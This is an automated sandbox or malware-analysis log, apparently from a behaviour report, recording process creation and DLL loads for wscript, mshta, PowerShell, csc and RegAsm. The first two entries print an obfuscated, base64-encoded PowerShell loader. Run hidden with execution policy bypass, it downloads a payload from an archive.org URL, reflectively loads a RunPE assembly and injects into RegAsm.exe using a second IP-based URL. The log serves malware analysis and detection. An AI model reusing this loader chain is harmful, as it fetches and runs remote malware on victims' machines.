                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
